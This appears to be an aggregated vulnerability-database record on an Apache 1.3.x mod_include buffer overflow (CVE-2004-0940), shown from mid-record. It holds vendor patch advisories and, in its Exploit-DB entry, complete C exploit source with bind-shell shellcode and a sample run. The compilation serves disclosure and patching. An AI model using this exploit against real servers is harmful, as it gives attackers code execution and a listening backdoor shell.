checksum: 838810 9dc7aa64b92560e2af3310495726c5a4\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_arm.deb\n Size/MD5 checksum: 544394 4f83a87a3efc91221f2de6e4b51495f1\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_i386.deb\n Size/MD5 checksum: 353260 5d8bba199ad51b93d69b3d93dd357bcc\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_i386.deb\n Size/MD5 checksum: 813432 0bb2c86f93d31ca3c677afc539f41835\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_i386.deb\n Size/MD5 checksum: 535772 fc62f039e6164064956de81416564da3\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_ia64.deb\n Size/MD5 checksum: 436892 d870f942fcf5f2176865ab0a0ff90ddc\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_ia64.deb\n Size/MD5 checksum: 1012454 f74ff7702abd1314867b5fd81874baad\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_ia64.deb\n Size/MD5 checksum: 949188 095050c609a54e53379c231629844a7c\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_hppa.deb\n Size/MD5 checksum: 386218 86b1b77c83a3b7346b11e5f00db8865e\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_hppa.deb\n Size/MD5 checksum: 891646 65e8f5775d23b19084a7606ff808c336\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_hppa.deb\n Size/MD5 checksum: 587146 c1fc5a49e8b7f1fc6295e406bcf88025\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_m68k.deb\n Size/MD5 checksum: 347934 480bd7ce670d5f87780c11c443dac1f5\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_m68k.deb\n Size/MD5 checksum: 821150 a3182920fcb02b913a1bc74bcb1910ab\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_m68k.deb\n Size/MD5 checksum: 537284 3fa994f1cd5adb9176ff403cae9af05a\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_mips.deb\n Size/MD5 checksum: 376480 a7fb2f7a83b03dfc2a79358890665e22\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_mips.deb\n Size/MD5 checksum: 844090 5803969beff45f8a67cb9bc2cf088ba3\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_mips.deb\n Size/MD5 checksum: 576466 d4e48602a41d150f55a1faf7a8a79729\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_mipsel.deb\n Size/MD5 checksum: 376572 25ce9de3e4451afd7b272c7223e8c472\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_mipsel.deb\n Size/MD5 checksum: 842774 2bb614356424be2c183b005f6e526098\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_mipsel.deb\n Size/MD5 checksum: 565664 2b118fb23f4620a15a0f198cc9a4c134\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_powerpc.deb\n Size/MD5 checksum: 367026 5c7bb480654c18173fc2832847b29a7d\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_powerpc.deb\n Size/MD5 checksum: 846210 2bb5492d16feb5776fe2bfd0a3ed9e3a\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_powerpc.deb\n Size/MD5 checksum: 559012 beb354c4458d0f80d9c1785ed0ce4bae\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_s390.deb\n Size/MD5 checksum: 363774 556139ecea6376447575f71260076024\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_s390.deb\n Size/MD5 checksum: 832552 40d5a926d7d6e912a2fbaded3e390766\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_s390.deb\n Size/MD5 checksum: 559466 f606926e180e055580734929ae327ac5\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_sparc.deb\n Size/MD5 checksum: 360932 5fbd6af082d95c20dc8b9d28762193ed\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_sparc.deb\n Size/MD5 checksum: 847426 3646a4ae614a8b7c0b10fec39a965a2b\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_sparc.deb\n Size/MD5 checksum: 544898 8a419bf9d03228d68793aea3af846dab\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 3, "modified": "2004-11-17T00:00:00", "published": "2004-11-17T00:00:00", "id": "DEBIAN:DSA-594-1:FDA26", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00203.html", "title": "[SECURITY] [DSA 594-1] New Apache packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T12:30:11", "description": "Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit. CVE-2004-0940. Local exploit for linux platform", "published": "2004-10-21T00:00:00", "type": "exploitdb", "title": "Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0940"], "modified": "2004-10-21T00:00:00", "id": "EDB-ID:587", "href": "https://www.exploit-db.com/exploits/587/", "sourceData": "/*********************************************************************************\r\n local exploit for mod_include of apache 1.3.x *\r\n written by xCrZx /18.10.2004/ *\r\n bug found by xCrZx /18.10.2004/ *\r\n *\r\n Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *\r\n *\r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nTechnical Details:\r\n\r\nthere is an overflow in get_tag function: \r\n \r\nstatic char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) \r\n{ \r\n... \r\nterm = c; \r\nwhile (1) { \r\nGET_CHAR(in, c, NULL, p); \r\n[1] if (t - tag == tagbuf_len) { \r\n*t = '\\0'; \r\nreturn NULL; \r\n} *\r\n// Want to accept \\\" as a valid character within a string. // \r\nif (c == '\\\\') { \r\n[2] *(t++) = c; // Add backslash // \r\nGET_CHAR(in, c, NULL, p); \r\nif (c == term) { // Only if // \r\n[3] *(--t) = c; // Replace backslash ONLY for terminator // \r\n} \r\n} \r\nelse if (c == term) { \r\nbreak; \r\n} \r\n[4] *(t++) = c; \r\n} \r\n*t = '\\0'; \r\n... \r\n\r\nas we can see there is a [1] check to determine the end of tag buffer \r\nbut this check can be skiped when [2] & [4] conditions will be occured\r\nat the same time without [3] condition.\r\n\r\nSo attacker can create malicious file to overflow static buffer, on \r\nwhich tag points out and execute arbitrary code with privilegies of \r\nhttpd child process. \r\n\r\nFix: \r\n[1*] if (t - tag >= tagbuf_len-1) { \r\n\r\nNotes: To activate mod_include you need write \"XBitHack on\" in httpd.conf \r\n\r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nExample of work: \r\n\r\n[root@blacksand htdocs]# make 85mod_include \r\ncc 85mod_include.c -o 85mod_include \r\n[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html \r\n[root@blacksand htdocs]# chmod +x evil.html \r\n[root@blacksand htdocs]# netstat -na|grep 52986 \r\n[root@blacksand htdocs]# telnet localhost 8080 \r\nTrying 127.0.0.1... \r\nConnected to localhost. \r\nEscape character is '^]'. \r\nGET /evil.html HTTP/1.0 \r\n^] \r\ntelnet> q \r\nConnection closed. \r\n[root@blacksand htdocs]# netstat -na|grep 52986 \r\ntcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN \r\n[root@blacksand htdocs]# \r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nNotes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always \r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nPersonal hello to my parents :) \r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nPublic shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz \r\n*********************************************************************************/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n\r\n#define EVILBUF 8202\r\n#define HTMLTEXT 1000\r\n\r\n#define HTML_FORMAT \"<html>\\n<!--#echo done=\\\"%s\\\" -->\\nxCrZx 0wn U\\n</html>\"\r\n\r\n#define AUTHOR \"\\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\\n\"\r\n\r\nint main(int argc, char **argv) {\r\n\r\nchar html[EVILBUF+HTMLTEXT];\r\nchar evilbuf[EVILBUF+1];\r\n\r\n//can be changed\r\nchar shellcode[] =\r\n\r\n// bind shell on 52986 port \r\n\"\\x31\\xc0\"\r\n\"\\x31\\xdb\\x53\\x43\\x53\\x89\\xd8\\x40\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x43\"\r\n\"\\x66\\xc7\\x44\\x24\\x02\\xce\\xfa\\xd1\\x6c\\x24\\x04\\x6a\\x10\\x51\\x50\\x89\"\r\n\"\\xe1\\xb0\\x66\\xcd\\x80\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x61\\x08\\xb0\"\r\n\"\\x66\\xcd\\x80\\x93\\x31\\xc9\\xb1\\x03\\x49\\xb0\\x3f\\xcd\\x80\\x75\\xf9\\x68\"\r\n\"\\x2f\\x73\\x68\\x20\\x68\\x2f\\x62\\x69\\x6e\\x88\\x4c\\x24\\x07\\x89\\xe3\\x51\"\r\n\"\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80\";\r\n\r\n//execve /tmp/sh <- your own program\r\n/*\r\n\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\"\r\n\"\\xb0\\x2e\\xcd\\x80\\xeb\\x15\\x5b\\x31\"\r\n\"\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\"\r\n\"\\x43\\x0c\\x8d\\x4b\\x08\\x31\\xd2\\xb0\"\r\n\"\\x0b\\xcd\\x80\\xe8\\xe6\\xff\\xff\\xff\"\r\n\"/tmp/sh\";\r\n*/\r\n\r\n\r\nchar NOP[] = \"\\x90\\x40\"; // special nops ;)\r\nchar evilpad[] = \"\\\\CRZCRZCRZCRZC\"; // trick ;)\r\n\r\nint padding,xpad=0;\r\nint i,fd;\r\nlong ret=0xbfff8688;\r\n\r\nif(argc>1) ret=strtoul(argv[1],0,16);\r\nelse { fprintf(stderr,AUTHOR\"\\nUsage: %s <RET ADDR> > file.html\\n\\n\",argv[0]);exit(0); }\r\n\r\npadding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);\r\n\r\nwhile(1) {\r\nif(padding%2==0) { padding/=2; break;}\r\nelse {padding--;xpad++;}\r\n}\r\n\r\nmemset(html,0x0,sizeof html);\r\nmemset(evilbuf,0x0,sizeof evilbuf);\r\n\r\nfor(i=0;i<padding;i++)\r\nmemcpy(evilbuf+strlen(evilbuf),&NOP,2);\r\nfor(i=0;i<xpad;i++)\r\nmemcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);\r\n\r\nmemcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);\r\nmemcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);\r\n*(long*)&evilbuf[strlen(evilbuf)]=ret;\r\n\r\nsprintf(html,HTML_FORMAT,evilbuf);\r\n\r\nprintf(\"%s\",html);\r\n\r\nreturn 0;\r\n}\n\n// milw0rm.com [2004-10-21]\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/587/"}], "freebsd": [{"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0940"], "description": "\nThere is a buffer overflow in a function used by mod_include\n\t that may enable a local user to gain privileges of a httpd\n\t child. Only users that are able to create SSI documents can\n\t take advantage of that vulnerability.\n", "edition": 4, "modified": "2004-10-22T00:00:00", "published": "2004-10-22T00:00:00", "id": "6E6A6B8A-2FDE-11D9-B3A2-0050FC56D258", "href": "https://vuxml.freebsd.org/freebsd/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html", "title": "apache mod_include buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:35:56", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0492", "CVE-2004-0940"], "description": "New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user.\n\nThe mod_ssl package has also been upgraded to version 2.8.22_1.3.33.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0940\n\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\npatches/packages/apache-1.3.33-i486-1.tgz: Upgraded to apache-1.3.33.\n This fixes one new security issue (the first issue, CAN-2004-0492, was fixed\n in apache-1.3.33). The second bug fixed in 1.3.3 (CAN-2004-0940) allows a\n local user who can create SSI documents to become \"nobody\". The amount of\n mischief they could cause as nobody seems low at first glance, but it might\n allow them to use kill or killall as nobody to try to create a DoS.\n Mention PHP's mhash dependency in httpd.conf (thanks to Jakub Jankowski).\n (* Security fix *)\npatches/packages/mod_ssl-2.8.22_1.3.33-i486-1.tgz: Upgraded to\n mod_ssl-2.8.22_1.3.33.\n\nWhere to find the new packages:\n\nUpdated packages for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/apache-1.3.33-i386-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nUpdated packages for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/apache-1.3.33-i386-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/apache-1.3.33-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/apache-1.3.33-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/apache-1.3.33-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 packages:\n53a9c132945eb4335aacfcb21d5996e0 apache-1.3.33-i386-1.tgz\nb0a95e205d3e88597aa9f1241ca7354f mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nSlackware 9.0 packages:\n429df7fa01205e5c12d3728f4987609f apache-1.3.33-i386-1.tgz\naf8345a9edf17dbd4e141b46d908990a mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nSlackware 9.1 packages:\nadb43447a8abcb7a6100343585d762db apache-1.3.33-i486-1.tgz\n00c1338c5c6db89960eb53ac4495ba41 mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nSlackware 10.0 packages:\n22db37b8d3e7a32b75a274520e11e272 apache-1.3.33-i486-1.tgz\n1968e2361039e07f69658665dafcf56a mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nSlackware -current packages:\nc450863cad0ed3771fea628d506b8caf apache-1.3.33-i486-1.tgz\n44fdebabf6130cd2fc4e048f5d619683 mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n\n > apachectl stop\n\nNext, upgrade the Apache package as root:\n\n > upgradepkg apache-1.3.33-i486-1.tgz\n\nFor mod_ssl users, IMPORTANT: Backup any keys/certificates you wish\nto save for mod_ssl (in /etc/apache/ssl.*), then upgrade mod_ssl:\n\n > upgradepkg mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nIf necessary, restore any mod_ssl config files.\n\nFinally, restart apache:\n\n > apachectl start\n\nOr, if you're running a secure server with mod_ssl:\n\n > apachectl startssl", "modified": "2004-11-01T08:00:31", "published": "2004-11-01T08:00:31", "id": "SSA-2004-305-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.533785", "type": "slackware", "title": "[slackware-security] apache+mod_ssl", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0987", "CVE-2004-0885", "CVE-2004-0940"], "description": "The Apache HTTP Server is a powerful, full-featured, efficient, and\nfreely-available Web server. The mod_ssl module provides strong\ncryptography for the Apache Web server via the Secure Sockets Layer (SSL)\nand Transport Layer Security (TLS) protocols.\n\nA buffer overflow was discovered in the mod_include module. This flaw\ncould allow a local user who is authorized to create server-side include\n(SSI) files to gain the privileges of a httpd child (user 'apache'). The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0940 to this issue.\n\nThe mod_digest module does not properly verify the nonce of a client\nresponse by using a AuthNonce secret. This could allow a malicious user who\nis able to sniff network traffic to conduct a replay attack against a\nwebsite using Digest protection. Note that mod_digest implements an older\nversion of the MD5 Digest Authentication specification, which is known not\nto work with modern browsers. This issue does not affect mod_auth_digest. \n(CAN-2003-0987).\n\nAn issue has been discovered in the mod_ssl module when configured to use\nthe \"SSLCipherSuite\" directive in a directory or location context. If a\nparticular location context has been configured to require a specific set\nof cipher suites, then a client is able to access that location using\nany cipher suite allowed by the virtual host configuration. (CAN-2004-0885). \n\nSeveral bugs in mod_ssl were also discovered, including:\n\n- memory leaks in SSL variable handling\n\n- possible crashes in the dbm and shmht session caches\n\nRed Hat Enterprise Linux 2.1 users of the Apache HTTP Server should upgrade\nto these erratum packages, which contains Apache version 1.3.27 with\nbackported patches correcting these issues.", "modified": "2018-03-14T19:25:44", "published": "2004-12-13T05:00:00", "id": "RHSA-2004:600", "href": "https://access.redhat.com/errata/RHSA-2004:600", "type": "redhat", "title": "(RHSA-2004:600) apache, mod_ssl security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0885", "CVE-2004-0940", "CVE-2004-0492"], "description": "The XPM library which is part of the XFree86/XOrg project is used by several GUI applications to process XPM image files. A source code review done by Thomas Biege of the SuSE Security-Team revealed several different kinds of bugs. The bug types are: - integer overflows - out-of-bounds memory access - shell command execution - path traversal - endless loops By providing a special image these bugs can be exploited by remote and/or local attackers to gain access to the system or to escalate their local privileges.\n#### Solution\nNo workaround exists to protect against these bugs.", "edition": 1, "modified": "2004-11-17T16:17:43", "published": "2004-11-17T16:17:43", "id": "SUSE-SA:2004:041", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-11/msg00008.html", "title": "remote system compromise in xshared, XFree86-libs, xorg-x11-libs", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:23:22", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0891", "CVE-2004-0885", "CVE-2004-0989", "CVE-2004-0940", "CVE-2004-1007", "CVE-2004-0930", "CVE-2004-0888", "CVE-2004-0889", "CVE-2004-0492", "CVE-2004-0882"], "description": "There is a problem in the Samba file sharing service daemon, which allows a remote user to have the service consume lots of computing power and potentially crash the service by querying special wildcarded filenames.\n#### Solution\nUpdate to the released packages. The only workaround would be not to use Samba.", "edition": 1, "modified": "2004-11-15T22:07:05", "published": "2004-11-15T22:07:05", "id": "SUSE-SA:2004:040", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-11/msg00007.html", "type": "suse", "title": "potential remote buffer overflow in samba", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}